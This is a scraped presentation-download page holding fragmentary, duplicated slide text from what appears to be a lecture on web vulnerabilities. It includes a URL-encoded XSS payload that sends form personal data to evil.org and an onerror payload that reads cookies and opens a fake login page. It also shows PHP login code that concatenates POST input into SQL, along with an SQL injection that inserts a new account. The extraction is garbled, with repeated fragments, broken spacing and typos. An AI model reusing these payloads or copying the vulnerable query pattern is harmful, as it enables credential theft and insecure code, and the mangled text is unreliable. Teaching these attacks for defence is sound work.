Скачать презентацию Vulnerability Search String is taken directly from query Скачать презентацию Vulnerability Search String is taken directly from query

238f31503e278023e5bb1ced643333b1.ppt

  • Количество слайдов: 73

Vulnerability: Search. String is taken directly from query string Vulnerability: Search. String is taken directly from query string

%22+onmouoseover%3 D%27 Client. Form% 2 Eaction%3 D%22 evil%2 Eorg%2 Fget%2 Easp%3 FDat a% 3 %22+onmouoseover%3 D%27 Client. Form% 2 Eaction%3 D%22 evil%2 Eorg%2 Fget%2 Easp%3 FDat a% 3 D%22+%2 B+Client. Form%2 EPersonal. Data%3 BClient Form% 2 Esubmit%3 B%27

<HTML> <TITLE>XSS Example</TITLE> Hello <SCRIPT> var pos=document. URL. index. Of( XSS Example Hello

Attacker provides malicious code: After processing, input <script>code</script> becomes: Attacker instead provides: <COMMENT> Code Attacker provides malicious code: After processing, input becomes: Attacker instead provides: Code becomes: code BY FILTER) (NOT PARSED - --> //--> - --> onerror="alert(document. cookie); window. open( onerror="alert(document. cookie); window. open(http: // evil. org/ fakeloginscreen. jsp); ">

$SQLquery = “SELECT * FROM users WHERE username=`”. $_POST[“username”]. ”’ AND password=‘”. $_POST[“password”]. ”’”; $SQLquery = “SELECT * FROM users WHERE username=`”. $_POST[“username”]. ”’ AND password=‘”. $_POST[“password”]. ”’”; $DBresult=db_query($SQLQuery); if($DBresult) { // username-password is correct, log the user on } else { //username-password is incorrect }

SELECT accountdata FROM acountinfo WHERE accountid = ` ‘; INSERT INTO accountdata (accountid, password) SELECT accountdata FROM acountinfo WHERE accountid = ` ‘; INSERT INTO accountdata (accountid, password) VALUES (`thomas`, ’ 12345’) – ‘ AND password = ‘ ‘